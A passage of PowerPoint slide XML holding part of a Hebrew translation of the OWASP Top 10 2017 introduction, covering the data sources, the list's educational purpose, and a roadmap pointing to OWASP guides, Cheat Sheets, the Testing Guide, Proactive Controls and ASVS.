                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מתבסס בעיקר על מידע שהוגש ע"י מעל 40 חברות המתמחות בפיתוח מאובטח וסקרים שמולאו בתעשייה ע"י מעל 500 אנשים פרטיים. המידע מתחלק לחולשות אבטחה אשר נאספו ממאות ארגונים ומעל 100,000 יישומים וממשקי פיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API’s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>). עשרת הנושאים נבחרו ותועדפו בהתאם לשכיחות המידע, בשילוב עם הערכות לגביהן קיימת הסמכה בנוגע לנתיבי התקפה, יכולת גילוי והשפעה.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>המטרה העיקרית של מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הנה לחנך מפתחים, מעצבים, ארכיטקטים, מנהלים וארגונים בנוגע להשלכות של חולשות האבטחה הנפוצות והחשובות בפיתוח יישומי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מהווה את הטכניקות הבסיסיות להגנה מפני תחומים בעלי סיכון גבוה, ומספקים הנחיות כיצד להמשיך מכאן.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>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605558425"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3311860"/>
          <a:ext cx="3352800" cy="5329140"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="132155">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מפת דרכים לפעילויות הבאות</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4993860">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>על תעצור במספר</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 10.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> קיימים מאות נושאים אשר עשויים להשפיע האבטחה הכוללות של יישום </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> כפי שמוזכר </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>במדריך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t> למפתחים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>ובסדרת מסמכי ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Cheat Sheet</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t> של </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. אלו חומרי קריאה חשובים עבור כל מפתח יישומי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> וממשקי פיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API’s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>). הדרכה כיצד לאתר בצורה אפקטיבית פגיעויות ביישומי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> וממשקי פיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API’s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) ניתן למצוא </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>במדריך הבדיקות של </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שינוי מתמיד</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ימשיך להשתנות. אפילו ללא שינוי של שורת קוד אחת ביישום שלך, אתה עשוי להיות פגיע כאשר חולשות מתגלות ונוספות דרכי תקיפה. אנא עבור על ההמלצות בסוף מסמך ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> על מנת לקרוא </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>מה הדבר הבא עבור מפתחים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>מה הדבר הבא עבור בודקי תוכנה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>מה הדבר הבא עבור ארגונים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>מה הדבר הבא עבור מנהלי מערכות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="1" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חשוב בצורה חיובית.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> כאשר תהיה מוכן להפסיק לרדוף אחר פגיעויות ולהתמקד בהשגת בקרות אבטחת מידע חזקות, פרויקט </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>עשרת הבקרות הפרו-אקטיביות של ארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מספק נקודת פתיחה על-מנת לסייע למפתחים להכניס היבטי אבטחה לתוך היישומים ומסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>הינו מדריך עבור ארגונים ובוחני יישומים לגבי מה לבדוק.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
